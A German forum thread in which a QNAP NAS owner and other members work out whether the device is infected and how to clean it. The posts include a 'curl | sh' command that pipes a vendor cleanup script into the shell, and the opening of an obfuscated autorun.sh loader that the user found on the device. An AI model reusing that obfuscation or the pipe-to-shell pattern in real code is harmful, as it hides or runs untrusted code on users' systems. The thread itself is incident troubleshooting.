Hab ich mir einen Virus eingefangen?

  • Hallo an alle,


    nach langer langer Zeit melde ich mich nochmal.


    Glaube mein NAS hat sich was eingefangen.

    Ich kann keine Apps mehr installieren oder stoppen.

    Vom Googlen her, passt das zu einem Befall oder?


    Ich habe mit den Mitteln die ich gefunden habe, bisher keinen Erfolg.


    Habe 2 Skripte getestet. Beide laufen nicht sauber durch...


    Code
    [~] # curl https://download.qnap.com/Storage/tsd/utility/derek-be-gone.sh | sh
      % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                     Dload  Upload   Total   Spent    Left  Speed 
    
    
      0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
    100   380  100   380    0     0   4672      0 --:--:-- --:--:-- --:--:--  4871
    sh: line 1: syntax error near unexpected token `newline'
    sh: line 1: `'

    Hat noch jemand einen Tipp für mich?

  • Für QNAP existiert eine Menge Malware... Das lässt sich nicht alles mit dem lösen was Du versucht hast. Aber fangen wir mal von vorne an:

    Welches Gerät, welches QTS / Firmware?

    Ist das Installieren und Stoppen von Apps dein einziges Problem? Dateien alle aufrufbar? Was sagen CPU und RAM Auslastung? Ist das NAS aus dem Internet erreichbar (gewesen)?

    Was passiert wenn Du Apps installieren oder stoppen willst?

  • Beide Skript laufen nicht mehr da QNAP die Ressourcen schon vor langem offline genommen hat.


    Welche Firmware? Malware Remover schon gelaufen?


    Welche Prozesse laufen denn? War das NAS dem freien Internet ausgesetzt ?

  • Ich habe ein TS469L.

    Die Firmware ist 4.3.4.1652.

    Hab ich vor ca 2 Wochen upgedatet.

    Davor hab ich (zu meiner Schande) recht lange keine Updates eingespielt.


    Das NAS hing hinter meiner FritzBox mit eingerichteter qnap cloud.


    Den MalewareRemover bekomme ich nicht installiert.

    Genau wie andere App Updates.


    Laufen tut ansonsten alles.

  • QNAP Cloud mit Portforwards ? .. Dann ist zumindest eine Infektion nicht abwegig.


    Wie gesagt mal Prozesse checken, ob die CPU damit beschäftigt ist alle Dateien gegen Lösegeld zu verschlüsseln.

  • Kommt das NAS ins Netz?

    Kannst Du generell keine Apps installieren oder nur spezifische nicht?


    Davor hab ich (zu meiner Schande) recht lange keine Updates eingespielt.

    Was auch immer das heißen mag.

  • QNAP Cloud mit Portforwards ? .. Dann ist zumindest eine Infektion nicht abwegig.


    Wie gesagt mal Prozesse checken, ob die CPU damit beschäftigt ist alle Dateien gegen Lösegeld zu verschlüsseln.

    Ja, die waren aktiviert.........

    Der Ressourcenmonitor will nicht starten. Die Anzeige der CPU im Dashboard bewegt sich immer im unteren einstelligen Prozentbereich.


    Kommt das NAS ins Netz?

    Kannst Du generell keine Apps installieren oder nur spezifische nicht?

    Zumindest bekomme ich über ssh Google angepingt.


    Bekomme keine App installiert.

  • Gut, wenigsten etwas.

    DNS funktioniert auch?

    Poste mal die Ausgabe von top

  • Wie teste ich den DNS?

  • Bin mir nicht ganz sicher was /usr/bin/ptzd und hawkeye-agent ist.

    Wie sieht die autorun.sh aus?

    Stell bitte die Ausgabe von ps rein.

  • PS

  • Sieht auf den ersten Blick eigentlich unspektakulär aus.

    Wie sieht die autorun.sh aus?

    Systemsteuerung -> System -> Hardware -> autorun.sh" anzeigen.

    Und die Ausgabe von netstat -tulpen

  • Könnte eben nicht mehr schreiben.

    Zeichenlimit.....


    Die Autorin ist sehr lang und kryptisch. Hier der Anfang:


    Bash
    #!/bin/sh 
    
    
    $AtecHcTovPwE$""t${iTiK}ype;t$'\x65'st${vFYiblbqWenenqb}${bMCOmH}${nfWvizJtLbULFQj};buil${XdwELjMFv}tin;$'\x74'${kOrRV}rue;${hGjcaqEk}tru${iiKRdCrLhTvm}e${AILHCX};f${QqCITwx}${zdDyx}a${sWbytd}lse;${pwiSn}fa${enKnzSEGfmokLh}lse;${USUHNZn}command${qFJQEfiKg};e${tjXfLtvY}v${IzKhp}${rnasdkfcGzC}al;${VPwTQwz}type${rciUNRiutbWfe};e${BQxyFSO}val;buil${GzivA}tin;ev${TiEuipv}${wDNDB}al;${elSPtyzOGPDVVWc}ev${CmXFzUKjCWZECCs}al;bu${nAgxTJFWgzzfhls}ilti${RIAlqxTnRQy}n;CjlyXS=t${pLTkcd}r${ZFqllqGJxy}

    netstat -tulpen


    Morgens geht's weiter. Muss mal in die Kiste, der Wecker geht früh...

  • Jo, sieht danach aus.

    Aber die autorun.sh kann doch nicht der einzige Garant dafür sein.

    Kann man da nicht weitere Prozesse oder Verbindungen heranziehen?

    Zumindest was außer den krytischen Angaben der autorun.sh auf eine Infektion hindeutet.

  • Wenn ich das NAS platt mache, laufe ich Gefahr über das Backup "Systemeinstellungen sichern" mir den Virus wieder zu fangen?


    Kann ich qmailagend ordentlich sichern?

    Der fängt schon sehr lange meine Mails zum sichern ab.


    Mal sehen, wo ich genug Speicher fürs Backup aufgetrieben bekomme.......


    Oder klappt es, daß nas ohne hdds zu booten? Evtl kann man es dann resetten und den Pool wieder einhängen?

    Einmal editiert, zuletzt von SM52 ()

  • Nein, das geht nicht.

    Ohne Platten ist nur ein kleiner Teil des QTS im DOM, das u.a. den Boot- und dann den Setupvorgang durchführt.

    Es führt kein Weg am "plattmachen" der HDDs vorbei.

    Wenn Du kein Backup hast, dann ist es jetzt wahrscheinlich auch zu spät.

    Auf alle Fälle das NAS nicht mehr dem Internet aussetzen, Portfreigaben wegnehmen, UPNP deaktivieren, myQNAPcloud nicht mehr nutzen, ...


    Ob das Sichern der Systemeinstellungen die Malware mitsichert? Mir wäre das Risiko zu gross, ich würde die mir notieren (Screenshots) und alles neu einrichten, ohne Backup.


    Gruss

  • Okay,


    Backup mache ich aber. Läuft im Moment per rrpr. Seit dem letzten Backup hat sich nicht so viel getan.

    Hab so gut es geht alle Daten gesichtet und kontrolliert.

    Habe einen Ordner gefunden, der nicht von mir ist. Hab da schon Anzeige gegen Unbekannt gestellt, da der Inhalt (Bilder) nicht legal war.


    NAS ist seit dem Virenverdacht von der cloud geztennt, Passwörter geändert und upnp am nas deaktiviert. Zusätzlich noch an der fritzbox der Internetzugang gesperrt ( außer temporär ausversehen ob ich Apps updaten kann).

    Einmal editiert, zuletzt von SM52 ()

  • Habe einen Ordner gefunden, der nicht von mir ist. Hab da schon Anzeige gegen Unbekannt gestellt, da der Inhalt (Bilder) nicht legal war.

    Darfst du das NAS dann überhaupt platt machen oder ist das jetzt ein Bewismittel?

    Denn je nach dem was da verteilt wurde, kommen die mit der Anschluss IP erstmal zu dir und dann hast du das Ding gekillt und kannst nicht mehr beweisen, dass du das gar nicht warst.